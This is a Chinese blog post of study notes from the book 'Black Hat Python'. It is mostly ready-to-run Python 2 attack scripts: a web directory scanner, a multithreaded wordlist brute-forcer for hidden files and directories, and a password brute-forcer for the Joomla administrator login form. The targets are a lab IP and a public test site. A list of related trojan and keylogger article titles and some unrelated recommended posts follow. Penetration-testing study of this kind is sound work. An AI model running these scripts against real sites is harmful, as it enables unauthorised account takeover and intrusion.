开源Web应用目录扫描器

这里的前提是Web服务器使用的是开源CMS来建站的,而且自己也下载了一套相应的开源代码,感觉意义并不大

#!/usr/bin/python

#coding=utf-8

import Queue

import threading

import os

import urllib2

threads = 10

target = "http://10.10.10.144/dunling"

directory = "/dunling"

filters = [".jpg",".gif",".png",".css"]

os.chdir(directory)

web_paths = Queue.Queue()

for r,d,f in os.walk("."):

    for files in f:

        remote_path = "%s/%s"%(r,files)

        if remote_path.startswith("."):

            remote_path = remote_path[1:]

        if os.path.splitext(files)[1] not in filters:

            web_paths.put(remote_path)

def test_remote():

    while not web_paths.empty():

        path = web_paths.get()

        url = "%s%s"%(target,path)

        request = urllib2.Request(url)

        try:

            response = urllib2.urlopen(request)

            content = response.read()

            print "[%d] => %s"%(response.code,path)

            response.close()

        except urllib2.HTTPError as error:

            # print "Failed %s"%error.code

            pass

for i in range(threads):

    print "Spawning thread : %d"%i

    t = threading.Thread(target=test_remote)

    t.start()

暴力破解目录和文件位置

#!/usr/bin/python

#coding=utf-8

import urllib2

import threading

import Queue

import urllib

threads = 50

target_url = "http://testphp.vulnweb.com"

wordlist_file = "/tmp/all.txt" # from SVNDigger

resume = None

user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"

def build_wordlist(wordlist_file):

    #读入字典文件

    fd = open(wordlist_file,"rb")

    raw_words = fd.readlines()

    fd.close()

    found_resume = False

    words = Queue.Queue()

    for word in raw_words:

        word = word.rstrip()

        if resume is not None:

            if found_resume:

                words.put(word)

            else:

                if word == resume:

                    found_resume = True

                    print "Resuming wordlist from: %s"%resume

        else:

            words.put(word)

    return words

def dir_bruter(word_queue,extensions=None):

    while not word_queue.empty():

        attempt = word_queue.get()

        attempt_list = []

        #检测是否有文件扩展名,若没有则就是要暴力破解的路径

        if "." not in attempt:

            attempt_list.append("/%s/"%attempt)

        else:

            attempt_list.append("/%s"%attempt)

        #如果我们想暴破扩展

        if extensions:

            for extension in extensions:

                attempt_list.append("/%s%s"%(attempt,extension))

        #迭代我们要尝试的文件列表

        for brute in attempt_list:

            url = "%s%s"%(target_url,urllib.quote(brute))

            try:

                headers = {}

                headers["User-Agent"] = user_agent

                r = urllib2.Request(url,headers=headers)

                response = urllib2.urlopen(r)

                if len(response.read()):

                    print "[%d] => %s"%(response.code,url)

            except urllib2.URLError, e:

                if hasattr(e,'code') and e.code != 404:

                    print "!!! %d => %s"%(e.code,url)

                pass

word_queue = build_wordlist(wordlist_file)

extensions = [".php",".bak",".orig",".inc"]

for i in range(threads):

    t = threading.Thread(target=dir_bruter,args=(word_queue,extensions,))

    t.start()

暴力破解HTML表格认证

1、检索登录页面,接受所有返回的cookies值;

2、从HTML中获取所有表单元素;

3、在你的字典中设置需要猜测的用户名和密码;

4、发送HTTP POST数据包到登录处理脚本,数据包含所有的HTML表单文件和存储的cookies值;

5、测试是否能登录成功。

#!/usr/bin/python

#coding=utf-8

import urllib2

import urllib

import cookielib

import threading

import sys

import Queue

from HTMLParser import HTMLParser

#简要设置

user_thread = 10

username = "admin"

wordlist_file = "/tmp/passwd.txt"

resume = None

#特定目标设置

target_url = "http://10.10.10.144/Joomla/administrator/index.php"

target_post = "http://10.10.10.144/Joomla/administrator/index.php"

username_field = "username"

password_field = "passwd"

success_check = "Administration - Control Panel"

class Bruter(object):

    """docstring for Bruter"""

    def __init__(self, username, words):

        self.username = username

        self.password_q = words

        self.found = False

        print "Finished setting up for: %s"%username

    def run_bruteforce(self):

        for i in range(user_thread):

            t = threading.Thread(target=self.web_bruter)

            t.start()

    def web_bruter(self):

        while not self.password_q.empty() and not self.found:

            brute = self.password_q.get().rstrip()

            jar = cookielib.FileCookieJar("cookies")

            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))

            response = opener.open(target_url)

            page = response.read()

            print "Trying: %s : %s (%d left)"%(self.username,brute,self.password_q.qsize())

            #解析隐藏区域

            parser = BruteParser()

            parser.feed(page)

            post_tags = parser.tag_results

            #添加我们的用户名和密码区域

            post_tags[username_field] = self.username

            post_tags[password_field] = brute

            login_data = urllib.urlencode(post_tags)

            login_response = opener.open(target_post,login_data)

            login_result = login_response.read()

            if success_check in login_result:

                self.found = True

                print "[*] Bruteforce successful. "

                print "[*] Username: %s"%self.username

                print "[*] Password: %s"%brute

                print "[*] Waiting for other threads to exit ... "

class BruteParser(HTMLParser):

    """docstring for BruteParser"""

    def __init__(self):

        HTMLParser.__init__(self)

        self.tag_results = {}

    def handle_starttag(self,tag,attrs):

        if tag == "input":

            tag_name = None

            tag_value = None

            for name,value in attrs:

                if name == "name":

                    tag_name = value

                if name == "value":

                    tag_value = value

                if tag_name is not None:

                    self.tag_results[tag_name] = value

def build_wordlist(wordlist_file):

    fd = open(wordlist_file,"rb")

    raw_words = fd.readlines()

    fd.close()

    found_resume = False

    words = Queue.Queue()

    for word in raw_words:

        word = word.rstrip()

        if resume is not None:

            if found_resume:

                words.put(word)

            else:

                if word == resume:

                    found_resume = True

                    print "Resuming wordlist from: %s"%resume

        else:

            words.put(word)

    return words

words = build_wordlist(wordlist_file)

brute_obj = Bruter(username,words)

brute_obj.run_bruteforce()

《Python黑帽子:黑客与渗透测试编程之道》 Web攻击的更多相关文章

  1. python黑帽子-黑客与渗透测试编程之道(源代码)

    链接: https://pan.baidu.com/s/1i5BnB5V   密码: ak9t

  2. 读书笔记 ~ Python黑帽子 黑客与渗透测试编程之道

    Python黑帽子  黑客与渗透测试编程之道   <<< 持续更新中>>> 第一章: 设置python 环境 1.python软件包管理工具安装 root@star ...

  3. 2017-2018-2 20179204 PYTHON黑帽子 黑客与渗透测试编程之道

    python代码见码云:20179204_gege 参考博客Python黑帽子--黑客与渗透测试编程之道.关于<Python黑帽子:黑客与渗透测试编程之道>的学习笔记 第2章 网络基础 t ...

  4. 《Python黑帽子:黑客与渗透测试编程之道》 扩展Burp代理

    下载jython,在Burpsuite的扩展中配置jython路径: Burp模糊测试: #!/usr/bin/python #coding=utf-8 # 导入三个类,其中IBurpExtender ...

  5. 《Python黑帽子:黑客与渗透测试编程之道》 Scapy:网络的掌控者

    窃取email认证: 测试代码: #!/usr/bin/python #coding=utf-8 from scapy.all import * #数据包回调函数 def packet_callbac ...

  6. 《Python黑帽子:黑客与渗透测试编程之道》 网络基础

    TCP客户端: 示例中socket对象有两个参数,AF_INET参数表明使用IPv4地址或主机名 SOCK_STREAM参数表示是一个TCP客户端.访问的URL是百度. #coding=utf-8 i ...

  7. 《Python黑帽子:黑客与渗透测试编程之道》 玩转浏览器

    基于浏览器的中间人攻击: #coding=utf-8 import win32com.client import time import urlparse import urllib data_rec ...

  8. 《Python黑帽子:黑客与渗透测试编程之道》 Windows下木马的常用功能

    有趣的键盘记录: 安装pyHook: http://nchc.dl.sourceforge.net/project/pyhook/pyhook/1.5.1/pyHook-1.5.1.win32-py2 ...

  9. 《Python黑帽子:黑客与渗透测试编程之道》 基于GitHub的命令和控制

    GitHub账号设置: 这部分按书上来敲命令即可,当然首先要注册一个GitHub账号还有之前安装的GitHub API库(pip install github3.py),这里就只列一下命令吧: mkd ...

随机推荐

  1. 【转】MEF程序设计指南三:MEF中组合部件(Composable Parts)与契约(Contracts)的基本应用

    按照MEF的约定,任何一个类或者是接口的实现都可以通过[System.ComponentModel.Composition.ExportAttribute] 特性将其定义为组合部件(Composabl ...

  2. Laravel 加载自定义的 helpers.php 函数

    Laravel 提供了很多 辅助函数,有时候我们也需要创建自己的辅助函数. 必须 把所有的『自定义辅助函数』存放于 bootstrap 文件夹中. 并在 bootstrap/app.php 文件的最顶 ...

  3. Netty 零拷贝(一)NIO 对零拷贝的支持

    Netty 零拷贝(二)NIO 对零拷贝的支持 Netty 系列目录 (https://www.cnblogs.com/binarylei/p/10117436.html) 非直接缓冲区(HeapBy ...

  4. WCF TOOL CODE

    .HTML <%@ Page Language="C#" AutoEventWireup="true" CodeBehind="WCFTool. ...

  5. 设计模式-生成者模式之c#代码

    using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.T ...

  6. 前端之JavaScript笔记1

    一 JavaScript的引入方式 <!DOCTYPE html> <html lang="en"> <head> <meta chars ...

  7. ORACLE实用函数之一 ratio_to_report的简单使用

    应用场景: 查询学生成绩级别(ABCDE)个人数和所占百分比(案列简单,勿喷). 表结构: create or replace table stu_grade( id varchar2(36), le ...

  8. 2018.10.16 uoj#340. 【清华集训2017】小 Y 和恐怖的奴隶主(矩阵快速幂优化dp)

    传送门 一道不错的矩阵快速幂优化dpdpdp. 设f[i][j][k][l]f[i][j][k][l]f[i][j][k][l]表示前iii轮第iii轮还有jjj个一滴血的,kkk个两滴血的,lll个 ...

  9. 2018.10.04 NOIP模拟 K进制(模拟)

    传送门 签到题,直接瞎模拟就行了. 代码

  10. Linux服务器部署系列之三—DNS篇

    网上介绍DNS的知识很多,在这里我就不再讲述DNS原理及做名词解释了.本篇我们将以一个实例为例来讲述DNS的配置,实验环境如下: 域名:guoxuemin.cn, 子域:shenzhen.guoxue ...